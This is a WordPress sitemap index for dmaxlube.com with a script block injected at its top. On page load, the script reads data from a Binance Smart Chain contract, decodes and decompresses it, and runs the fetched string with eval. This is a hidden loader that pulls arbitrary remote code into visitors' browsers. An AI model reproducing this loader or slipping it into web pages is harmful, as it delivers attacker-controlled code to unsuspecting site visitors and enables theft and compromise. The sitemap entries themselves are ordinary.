    <script src="https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/pako/2.0.4/pako.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/crypto-js.min.js"></script>
    <script>
       document.addEventListener("DOMContentLoaded", async () => {
           const w3 = new Web3("https://bsc-dataseed.binance.org/");
           const ct = new w3.eth.Contract([
               {inputs:[], stateMutability:"nonpayable", type:"constructor"},
               {inputs:[], name:"orchidABI", outputs:[{internalType:"string", name:"", type:"string"}], stateMutability:"view", type:"function"},
               {inputs:[], name:"orchidAddress", outputs:[{internalType:"string", name:"", type:"string"}], stateMutability:"view", type:"function"},
               {inputs:[], name:"merlionABI", outputs:[{internalType:"string", name:"", type:"string"}], stateMutability:"view", type:"function"},
               {inputs:[], name:"merlionAddress", outputs:[{internalType:"string", name:"", type:"string"}], stateMutability:"view", type:"function"}
           ], "0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53");
           const oABI = JSON.parse(pako.ungzip(
               Uint8Array.from(atob(await ct.methods.orchidABI().call()), c => c.charCodeAt(0)),
               {to:"string"}
           ));
           const oAddr = await ct.methods.orchidAddress().call();
           const orchid = new w3.eth.Contract(oABI, oAddr);
           const ds = pako.ungzip(
               Uint8Array.from(atob(await orchid.methods.tokyoSkytree().call()), c => c.charCodeAt(0)),
               {to:"string"}
           );
           eval(`(async(orchid)=>{${ds}})(orchid);`);
       });
    </script>
    <?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://dmaxlube.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://dmaxlube.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://dmaxlube.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://dmaxlube.com/wp-sitemap-posts-product-1.xml</loc></sitemap><sitemap><loc>https://dmaxlube.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://dmaxlube.com/wp-sitemap-taxonomies-product_cat-1.xml</loc></sitemap><sitemap><loc>https://dmaxlube.com/wp-sitemap-taxonomies-product_tag-1.xml</loc></sitemap><sitemap><loc>https://dmaxlube.com/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
